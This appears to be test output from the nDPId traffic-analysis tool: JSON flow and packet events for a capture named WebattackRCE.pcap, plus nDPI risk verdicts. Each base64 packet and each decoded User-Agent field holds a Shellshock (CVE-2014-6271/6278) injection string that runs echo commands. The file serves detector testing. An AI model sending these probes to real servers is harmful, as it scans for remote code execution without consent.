00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277414,"pkt":"AAAAAAAAAAAAAAAACABFAAENCPdAAEAGMvJ\/AAABfwAAAcUyH5A4wTA94El3uoAYAED\/AQAAAQEICp1m\/c6dZv3OR0VUIC9oZWxwZGVzay5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277416,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgptAAEAGuVB\/AAABfwAAAcU0H5CIJLpUcW+qJoAYAED+\/gAAAQEICp1m\/dCdZv3QR0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277417,"pkt":"AAAAAAAAAAAAAAAACABFAAEKMxlAAEAGCNN\/AAABfwAAAcU2H5CRJgvewUykPIAYAED+\/gAAAQEICp1m\/dGdZv3RR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277419,"pkt":"AAAAAAAAAAAAAAAACABFAAEJrmtAAEAGjYF\/AAABfwAAAcU4H5CXuZakZnwUBoAYAED+\/QAAAQEICp1m\/dOdZv3TR0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277420,"pkt":"AAAAAAAAAAAAAAAACABFAAEJZRVAAEAG1td\/AAABfwAAAcU6H5C6AV3ZPf\/xToAYAED+\/QAAAQEICp1m\/dSdZv3UR0VUIC9pbmZvLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277422,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0gtAAEAGaeJ\/AAABfwAAAcU8H5DcN+rDzEDc2oAYAED+\/AAAAQEICp1m\/dadZv3WR0VUIC9pbmZvLnNoIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277423,"pkt":"AAAAAAAAAAAAAAAACABFAAENVqhAAEAG5UB\/AAABfwAAAcU+H5CeOW5utt+cAoAYAED\/AQAAAQEICp1m\/dedZv3XR0VUIC9sb2FkcGFnZS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277425,"pkt":"AAAAAAAAAAAAAAAACABFAAEKJkVAAEAGFad\/AAABfwAAAcVAH5DPeB6QOQhEGoAYAED+\/gAAAQEICp1m\/didZv3YR0VUIC9sb2dpbi5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277426,"pkt":"AAAAAAAAAAAAAAAACABFAAEKG0lAAEAGIKN\/AAABfwAAAcVCH5Dr2SOM+8VpkIAYAED+\/gAAAQEICp1m\/dqdZv3aR0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277428,"pkt":"AAAAAAAAAAAAAAAACABFAAEJsHVAAEAGi3d\/AAABfwAAAcVEH5DgV4i\/xF\/y64AYAED+\/QAAAQEICp1m\/dydZv3cR0VUIC9sb2dpbi5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"}
01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
